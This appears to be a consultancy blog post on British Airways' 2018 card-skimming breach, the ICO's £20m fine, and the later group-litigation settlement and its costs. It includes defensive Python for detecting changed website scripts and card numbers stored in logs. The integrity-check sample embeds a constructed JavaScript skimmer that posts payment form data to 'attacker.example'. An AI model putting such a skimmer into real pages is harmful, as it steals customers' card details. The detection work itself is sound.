LEGAL, REGULATORY & COMPLIANCE CONSULTANTS

Handley Gill Limited

B.A. B.A. Black Sheep Returns to the Fold

British Airways has settled the group litigation brought against it in connection with the 2018 data breach, in which the details of 429,612 customers, including payment card details, were stolen in a criminal attack. This brings to a conclusion the various legal and regulatory proceedings that arose following the incident.

British Airways had been the subject of a hack between 22 June and 5 September 2018, carried out using the compromised credentials of a supplier’s employee on a Citrix remote access gateway that BA made available for remote working. Once the attacker had gained access to BA’s network, they edited the JavaScript on BA’s website so that customer payment card data entered during the booking process was also sent to a domain under the attacker’s control, without disrupting BA’s own payment flow. BA estimated that 429,612 data subjects were affected to varying degrees by the breach.

British Airways has already been subjected to a penalty notice issued by the Information Commissioner’s Office under s155 Data Protection Act 2018 in October 2020 in the sum of £20 million. BA had denied liability, as the victim of criminal activity, but the ICO nevertheless determined that BA had been negligent in its failure to comply with its legal obligations under Article 5(1)(f) and Article 32 GDPR to take appropriate technical and organisational measures to secure data, having regard to factors including:

·       the absence of a requirement for multi-factor authentication to gain access to the Citrix environment (or of other compensating controls, such as a VPN or IP allow-listing);

·       the ability of the attacker to ‘break out’ of the Citrix environment to access the wider BA network, despite this being a known risk, and the lack of a risk assessment and implementation of any mitigations in relation to this prospect;

·       the attacker’s ability to access a file which stored, in unencrypted plain text, the username and password of a privileged account with domain administrator rights (a practice the ICO rejected as being either standard or acceptable as a time-saving measure);

·       the attacker’s ability subsequently to ascertain a system administrator username and password;

·       the unintended logging of customer payment card data in plain text, which had been occurring since December 2015, with log files retained for 95 days, contrary to the Payment Card Industry Data Security Standard (‘PCI DSS’); these logs exposed approximately 108,000 card details to the attacker;

·       the absence of any measures to detect unauthorised changes to BA’s website code; and,

·       BA’s inadequate penetration testing regime.
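The ICO’s finding that nothing detected the change to BA’s website code is the one most directly addressable with tooling. The following is an added illustration, not code from BA or from the ICO’s notice: it keeps a release-time hash baseline of the site’s first-party scripts, compares it with what is actually being served, and, for any modified script, lists the external hosts the script now talks to, which is where a card skimmer sends its data. The file names, script contents, the skimmer snippet and the allow-listed hosts are all constructed for the example.

```python
import base64
import hashlib
import re

# Constructed sample (not BA's real assets): first-party scripts as approved at release.
BASELINE_FILES = {
    "/static/js/checkout.js": (
        b"function pay(form) {\n"
        b"  return fetch('/api/pay', {method: 'POST', body: new FormData(form)});\n"
        b"}\n"
    ),
    "/static/js/vendor/lib.min.js": b"/* vendor library */window.lib={version:'1.0'};\n",
}

# Constructed sample: the same paths as served later. A skimmer has been appended to
# checkout.js that posts the payment form to a host the attacker controls; the vendor
# library is untouched. The host name is an assumption for the example.
SKIMMER = (
    b"(function(){var f=document.forms[0];f.addEventListener('submit',function(){"
    b"fetch('https://attacker.example/collect',{method:'POST',body:new FormData(f)});});})();\n"
)
SERVED_FILES = {
    "/static/js/checkout.js": BASELINE_FILES["/static/js/checkout.js"] + SKIMMER,
    "/static/js/vendor/lib.min.js": BASELINE_FILES["/static/js/vendor/lib.min.js"],
}

# Assumed allow-list of hosts first-party scripts are permitted to contact.
FIRST_PARTY_HOSTS = {"www.example.com", "api.example.com"}


def sha256_hex(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def build_baseline(files: dict) -> dict:
    """Record the approved SHA-256 of every script at release time (store this off the web server)."""
    return {path: sha256_hex(content) for path, content in files.items()}


def check_integrity(baseline: dict, served: dict) -> dict:
    """Compare the scripts actually served against the release baseline."""
    modified = sorted(p for p in baseline if p in served and sha256_hex(served[p]) != baseline[p])
    added = sorted(p for p in served if p not in baseline)
    missing = sorted(p for p in baseline if p not in served)
    return {
        "modified": modified,
        "added": added,
        "missing": missing,
        "ok": not (modified or added or missing),
    }


URL_HOST = re.compile(rb"https?://([A-Za-z0-9.-]+)")


def foreign_hosts(content: bytes, allowed: set) -> list:
    """Hosts referenced by a script that are not on the allow-list."""
    hosts = {h.decode("ascii") for h in URL_HOST.findall(content)}
    return sorted(hosts - allowed)


def sri_attribute(content: bytes) -> str:
    """Subresource Integrity value for <script integrity="..."> (sha384, base64)."""
    return "sha384-" + base64.b64encode(hashlib.sha384(content).digest()).decode("ascii")


def triage(baseline: dict, served: dict, allowed: set) -> dict:
    """Integrity report plus the off-list hosts contacted by each modified script."""
    report = check_integrity(baseline, served)
    report["foreign_hosts"] = {p: foreign_hosts(served[p], allowed) for p in report["modified"]}
    return report


if __name__ == "__main__":
    print(triage(build_baseline(BASELINE_FILES), SERVED_FILES, FIRST_PARTY_HOSTS))
```

Two caveats a practitioner would add. The baseline has to be kept somewhere the web server cannot write to, and the comparison has to be run against what a browser actually receives, otherwise an attacker with the level of access described above simply updates the baseline alongside the script. Subresource Integrity (the `sri_attribute` helper) is worth deploying for scripts loaded from third parties or CDNs, but it would not on its own have prevented an attacker who could edit files on the origin, since the same access allows the `integrity` attribute in the HTML to be rewritten.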

The ICO noted that the failure to implement multi-factor authentication, for example, was contrary to guidance issued by the National Cyber Security Centre, including in its supply chain security guidance, and the Commissioner’s own guidance on ‘GDPR Security Outcomes’.
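The PCI DSS finding above, that card numbers had been written to logs in plain text for almost three years without anyone noticing, is also something a routine check would catch. The following added example (not BA’s tooling, and not prescribed by PCI DSS itself) scans log lines for 13- to 19-digit runs, confirms them with the Luhn check so that order references and timestamps are not reported, and masks confirmed numbers to the first six and last four digits. The log lines are constructed; the card numbers in them are the publicly known Visa and Mastercard test numbers.

```python
import re

# Constructed sample log lines (not BA's logs). The order reference is 16 digits but
# fails the Luhn check; the last card number is deliberately one digit off.
SAMPLE_LOG = [
    "2018-08-22T10:15:03Z INFO booking=BA123456 pnr=ABCDEF status=OK",
    "2018-08-22T10:15:04Z DEBUG payment card=4111111111111111 exp=12/23 cvv=123 amount=249.00",
    "2018-08-22T10:15:05Z DEBUG payment card=5555 5555 5555 4444 exp=01/24",
    "2018-08-22T10:15:06Z INFO order_ref=1234567890123456 shipped",
    "2018-08-22T10:15:07Z DEBUG payment card=4111111111111112 exp=12/23",
]

# 13-19 digits, optionally separated by single spaces or dashes, not part of a longer digit run.
PAN_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_valid(digits: str) -> bool:
    """Luhn check digit as used by payment card numbers."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits: str) -> str:
    """Keep the first six and last four digits, the most PCI DSS allows to be displayed."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def _confirmed_pan(match_text: str):
    digits = re.sub(r"[ -]", "", match_text)
    if 13 <= len(digits) <= 19 and luhn_valid(digits):
        return digits
    return None


def find_pans(line: str) -> list:
    """Luhn-valid card numbers (digits only) present in one log line."""
    return [d for d in (_confirmed_pan(m.group(0)) for m in PAN_CANDIDATE.finditer(line)) if d]


def redact_line(line: str) -> str:
    """Replace confirmed card numbers with their masked form; leave everything else as-is."""
    def repl(m):
        digits = _confirmed_pan(m.group(0))
        return mask_pan(digits) if digits else m.group(0)
    return PAN_CANDIDATE.sub(repl, line)


def scan_log(lines) -> list:
    """(line number, masked PAN) for every card number stored in clear; an empty list means clean."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for digits in find_pans(line):
            hits.append((n, mask_pan(digits)))
    return hits


if __name__ == "__main__":
    for n, masked in scan_log(SAMPLE_LOG):
        print(f"line {n}: card number stored in clear: {masked}")
```

Run as a scheduled job over the log directory, a non-empty result from `scan_log` is the alert; `redact_line` can be applied at the logging layer so that the number never reaches disk. Note that the redactor does not touch the `cvv=123` field in the sample: PCI DSS forbids retaining sensitive authentication data at all after authorisation, so the fix for that field is to stop it being logged, not to mask it.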

The ICO considered it likely that many of the affected individuals “will, depending on their circumstances, have suffered anxiety and distress”. That view held regardless of the measures card issuers take to protect customers from fraud, the fact that some customers did not have the CVV of their payment card compromised (321,000 customers had both card number and CVV compromised), BA’s commitment to reimburse any financial losses, and BA’s offer of free credit monitoring, which was taken up by just 40,000 customers. The ICO chose not to comment on BA’s submission that "claimant law firms will, for entirely self-serving purposes, use the word ‘distress’ very liberally, essentially with the aim of garnering thousands of potential claimants on no win-no-fee agreement... "

The ICO, acting in its role as the lead supervisory authority under the GDPR, had originally publicised its issuance of a Notice of Intent in July 2019, indicating an intention to fine BA some £183,390,000, more than nine times the sum ultimately imposed. In our consultants’ experience, it is not uncommon to see the ICO significantly reduce a proposed fine between the Notice of Intent and the Penalty Notice, and the regulated entity’s opportunity to make submissions on the Notice of Intent can support this. In this case, the ICO was also forced to concede that, on public and EU law principles, it was not entitled to rely on its then unpublished ‘Draft Internal Procedure for Setting and Issuing Monetary Penalties’. The ICO’s consultation on its draft ‘Statutory guidance on our regulatory action’ closed in November 2020.

In finalising the value of the fine, and having regard to its Regulatory Action Policy, the ICO took into account BA’s prompt notification and its co-operation with the investigation, and determined that a penalty of £30m would be appropriate before adjustment. No uplift was applied for deterrent effect or for aggravating factors. It is notable that, despite being the victim of criminal activity, BA was given no credit for this, on account of the deficiencies in the security of its systems and architecture. The ICO did apply a number of mitigating factors: the impact of adverse publicity in relation to the breach itself and the threatened regulatory action; the measures BA took to inform affected data subjects and mitigate the damage to them, including its offer to reimburse customers and its offer of free credit monitoring; BA’s co-operation with other regulatory bodies; and the remedial security measures it had implemented (albeit not the cost of these). Together these were considered to warrant a 20% discount, reducing the fine to £24m. The ICO declined to compare the level of the proposed fine with those issued by other supervisory authorities across Europe for other breaches. Ability to pay is also a relevant factor which can mitigate the value of a fine, and BA argued that, as a consequence of the COVID-19 pandemic, the fine should be significantly reduced or extinguished. The ICO accepted a further reduction of £4m, bringing the fine to £20m. Against BA’s turnover for the relevant period of £12.26bn, the fine amounted to approximately 0.16% of annual turnover, compared with a possible maximum of 4%.

In considering the factor under Article 83(2)(g) GDPR relating to the categories of personal data affected by the breach, the ICO relied upon the 2013 paper ‘Recommendations for a methodology of the assessment of severity of personal data breaches’, issued by ENISA (then the European Union Agency for Network and Information Security, now the European Union Agency for Cybersecurity) and prepared with the Greek and German data protection authorities. This provides a formula for calculating breach severity and recommends that the disclosure of full financial data which could enable fraud, or allow a detailed social or financial profile to be built, be treated as being of the maximum severity, the same category as sensitive/special category data.

The terms of the settlement of the ‘British Airways Data Event Group Litigation’, in the case of Weaver and others v British Airways plc, are currently confidential, although we might expect them to be reflected in BA’s financial statements in due course. As such, we don’t yet know how much money has been paid or how it will be split between the Claimants and their legal representatives. As at 31 December 2020, BA had made provision for legal claims in the sum of £32m. BA did not accept liability as part of the settlement.

As of 1 February 2021, a total of 22,230 clients had signed up with the lead claimant solicitors and approximately another 1,000 had signed up with other claimant firms, together around 5% of affected data subjects, although the claimant solicitor firms anticipated a further 20,000 claimants signing up by the March 2021 cut-off date, which would bring the total to roughly 10%. That would also be roughly equivalent to the number of data subjects who took up BA’s offer of free credit monitoring.

Following the incident, when law firms were advertising for potential claimants, one of the claimant firms indicated that it anticipated that individuals could be awarded up to £2,000 each whereas another was reported in The Sun as believing up to £6,000 could be available. Earlier this year, one claimant firm suggested that the claims could cost BA up to £2.4 billion, to which BA responded that “We do not recognise the damages figures that Your Lawyers has put forward, and they have not appeared in the claims”.

The Court of Appeal has previously held (under the Data Protection Act 1998) that a nominal sum of £1 should be awarded for damage, in addition to £750 for distress, where inaccurate personal data had been shared with a credit reference agency. Taking the approach in TLT and others, again under the Data Protection Act 1998, an award of £1,250 would be equivalent to sustaining “less severe” psychiatric damage in a personal injury claim. Since the TLT decision, the General Data Protection Regulation (‘GDPR’) and the Data Protection Act 2018 have come into force, and the Court of Appeal has confirmed in Lloyd v Google (another case under the 1998 Act) that damages can be awarded for loss of control of personal data even in the absence of any mental distress, although the Supreme Court’s judgment on Google’s appeal against that decision is awaited. Nevertheless, an expectation of even £2,000 per data subject in the absence of any actual financial loss continues to appear ambitious.

While even relatively small sums awarded to large numbers of data subjects can soon mount up, it is the legal costs associated with such claims that often present the biggest risk.

The common costs of the group litigation, that is to say the costs of dealing with group litigation order issues, the costs of individual test claims and the costs incurred by the lead legal representative in administering the group litigation, were budgeted to amount to millions of pounds for both the Claimants and the Defendant. In addition to the common costs, there are individual costs in relation to each claim. The Claimants initially sought approximately £1,200 per case, although by the time of the costs budgeting hearing this had been reduced to £624 per case. Across an anticipated 43,230 claimants, however, that would still amount to almost £27m on top of the common costs and the compensation itself. By reaching a settlement, BA will have significantly reduced its costs exposure.

Some succour for BA and other defendants came from the confirmation that claimant firms would not be entitled to recover the advertising fees associated with recruiting potential claimants, and that these were properly to be considered general overheads of the claimant firms rather than costs attributable to the litigation. The firms had sought to recover a sum of £443,000 already incurred and a further £557,000 intended to be spent on future advertising.

Even anticipating that the settlement will fall within BA’s provisions, taking into account the ICO’s fine, BA’s own legal costs, the costs of settlement, and the costs of managing and remediating the breach itself, including IT and PR costs, the breach is likely to have cost BA in excess of £50m.

Should you require assistance in reviewing your organisation’s data protection compliance, preparing for how your organisation should respond to a data breach, in managing a data breach, or liaising with regulators in the context of data protection enforcement action, please contact us: info@handleygill.com.